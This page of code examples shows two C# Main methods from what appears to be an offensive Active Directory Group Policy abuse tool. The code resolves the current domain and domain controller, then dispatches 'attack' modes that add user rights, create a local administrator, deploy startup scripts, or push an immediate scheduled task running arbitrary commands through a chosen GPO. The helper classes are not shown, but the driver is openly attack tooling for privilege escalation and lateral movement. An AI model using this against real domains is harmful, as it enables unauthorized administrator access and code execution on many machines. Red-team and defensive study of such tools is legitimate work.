Exemplo n.º 1
0
        static void Main(string[] args)
        {
            // CHANGE THESE
            string ScriptName    = "";
            string ScriptContent = "";
            string GPOName       = "";

            try
            {
                Domain currentDomain    = Domain.GetCurrentDomain();
                string DomainController = currentDomain.PdcRoleOwner.Name.ToLower();
                string DomainName       = currentDomain.Name.ToLower();

                string[] DCs;
                string   DistinguishedName = "CN=Policies,CN=System";

                DCs = DomainName.Split('.');

                foreach (string DC in DCs)
                {
                    DistinguishedName += ",DC=" + DC;
                }

                Console.WriteLine($"[+] Domain = {DomainName}");
                Console.WriteLine($"[+] Domain Controller = {DomainController}");
                Console.WriteLine($"[+] Distinguished Name = {DistinguishedName}");

                // CHANGE THIS
                StartupScript.NewStartupScript(ScriptName, ScriptContent, DomainName, DomainController, GPOName, DistinguishedName, "User");
            }
            catch (Exception e)
            {
                Console.Error.WriteLine("[!] {0}", e.Message);
            }
        }
Exemplo n.º 2
0
        static void Main(string[] args)
        {
            string GPOName;
            string ScriptName;
            string ScriptContent;
            string UserAccount;

            string[] UserRights;
            string   Author;
            string   TaskName;
            string   Command;
            string   Arguments;
            string   ObjectType;
            bool     Force;

            string[] required;

            try {
                string[] keys = new string[] { "attack", "gponame", "useraccount", "userrights", "scriptname", "scriptcontent", "author", "taskname", "command", "arguments", "type", "force" };

                var    arguments = new Dictionary <string, string>();
                string allargs   = String.Join(" ", args);
                string oldkey    = String.Empty;

                string currkey = String.Empty;
                string currval = String.Empty;

                // mynew=friend never=believes potatoe=darkess of the soul==
                for (int i = 0; i < allargs.Length; i++)
                {
                    if (i == allargs.Length - 1 && currkey.Length > 0 && !arguments.ContainsKey(currkey))
                    {
                        currval            = currval + allargs[i];
                        arguments[currkey] = currval;
                    }
                    else if (allargs[i].ToString() == "=" && HasWalkedBackKey(i, allargs, keys))
                    {
                        oldkey  = currkey;
                        currkey = GetWalkedBackKey(i, allargs, keys);
                        //  Save previous if exists
                        if (oldkey.Length > 0)
                        {
                            char[] charsToTrim = { ' ' };
                            arguments[oldkey] = ChopEnd(currval, currkey).TrimEnd(charsToTrim);
                        }
                        currval = String.Empty;
                    }
                    else
                    {
                        currval = currval + allargs[i];
                    }
                }

                DebugArgs(arguments, keys);


                Domain currentDomain    = Domain.GetCurrentDomain();
                string DomainController = currentDomain.PdcRoleOwner.Name.ToLower();
                string DomainName       = currentDomain.Name.ToLower();

                string[] DCs;
                string   DistinguishedName = "CN=Policies,CN=System";

                Console.WriteLine($"[+] Domain = {DomainName}");
                Console.WriteLine($"[+] Domain Controller = {DomainController}");
                Console.WriteLine($"[+] Distinguished Name = {DistinguishedName}");

                DCs = DomainName.Split('.');

                foreach (string DC in DCs)
                {
                    DistinguishedName += ",DC=" + DC;
                }

                if (arguments.ContainsKey("attack"))
                {
                    string AttackName = arguments["attack"];
                    if (AttackName.ToLower() == "addnewrights")
                    {
                        required = new string[] { "gponame", "useraccount", "userrights" };
                        if (ContainsAll(arguments, required))
                        {
                            GPOName     = arguments["gponame"];
                            UserAccount = arguments["useraccount"];
                            UserRights  = arguments["userrights"].Split(',');
                            UserRightAssignment.AddNewRights(DomainName, DomainController, GPOName, DistinguishedName, UserRights, UserAccount);
                        }
                        else
                        {
                            Console.WriteLine("Missing Arguments for Attack Type!");
                            PrintHelp();
                        }
                    }
                    else if (AttackName.ToLower() == "newlocaladmin")
                    {
                        required = new string[] { "gponame", "useraccount" };
                        if (ContainsAll(arguments, required))
                        {
                            GPOName     = arguments["gponame"];
                            UserAccount = arguments["useraccount"];
                            if (arguments.ContainsKey("force") && arguments["force"].ToLower() == "true")
                            {
                                Force = true;
                                Console.WriteLine($"[+] Argument force: Resolved to True");
                            }
                            else
                            {
                                Console.WriteLine($"[+] Argument force: Resolved to False");
                                Force = false;
                            }
                            LocalAdmin.NewLocalAdmin(UserAccount, DomainName, DomainController, GPOName, DistinguishedName, Force);
                        }
                        else
                        {
                            Console.WriteLine("Missing Arguments for Attack Type!");
                            PrintHelp();
                        }
                    }
                    else if (AttackName.ToLower() == "newstartupscript")
                    {
                        required = new string[] { "gponame", "scriptname", "scriptcontent" };
                        if (ContainsAll(arguments, required))
                        {
                            GPOName       = arguments["gponame"];
                            ScriptName    = arguments["scriptname"];
                            ScriptContent = arguments["scriptcontent"];
                            if (arguments.ContainsKey("type") && arguments["type"].ToLower() == "computer")
                            {
                                ObjectType = "Computer";
                            }
                            else
                            {
                                ObjectType = "User";
                            }
                            Console.WriteLine($"[+] Argument type: Resolved to {ObjectType}");
                            StartupScript.NewStartupScript(ScriptName, ScriptContent, DomainName, DomainController, GPOName, DistinguishedName, ObjectType);
                        }
                        else
                        {
                            Console.WriteLine("Missing Arguments for Attack Type!");
                            PrintHelp();
                        }
                    }
                    else if (AttackName.ToLower() == "newimmediatetask")
                    {
                        required = new string[] { "gponame", "author", "taskname", "command", "arguments" };

                        if (ContainsAll(arguments, required))
                        {
                            GPOName   = arguments["gponame"];
                            Author    = arguments["author"];
                            TaskName  = arguments["taskname"];
                            Command   = arguments["command"];
                            Arguments = arguments["arguments"];
                            if (arguments.ContainsKey("type") && arguments["type"].ToLower() == "computer")
                            {
                                ObjectType = "Computer";
                            }
                            else
                            {
                                ObjectType = "User";
                            }
                            Console.WriteLine($"[+] Argument type: Resolved to {ObjectType}");
                            if (arguments.ContainsKey("force") && arguments["force"].ToLower() == "true")
                            {
                                Force = true;
                                Console.WriteLine($"[+] Argument force: Resolved to True");
                            }
                            else
                            {
                                Console.WriteLine($"[+] Argument force: Resolved to False");
                                Force = false;
                            }
                            ScheduledTask.NewImmediateTask(DomainName, DomainController, GPOName, DistinguishedName, TaskName, Author, Arguments, Command, Force, ObjectType);
                        }
                        else
                        {
                            Console.WriteLine("Missing Arguments for Attack Type!");
                            PrintHelp();
                        }
                    }
                    else
                    {
                        Console.WriteLine("Unsupported Attack Type! Sorry!");
                        PrintHelp();
                    }
                }
                else
                {
                    Console.WriteLine("No Attack Provided!");

                    PrintHelp();
                }
            } catch (Exception e) {
                Console.Error.WriteLine("[!] {0}", e.Message);
            }
        }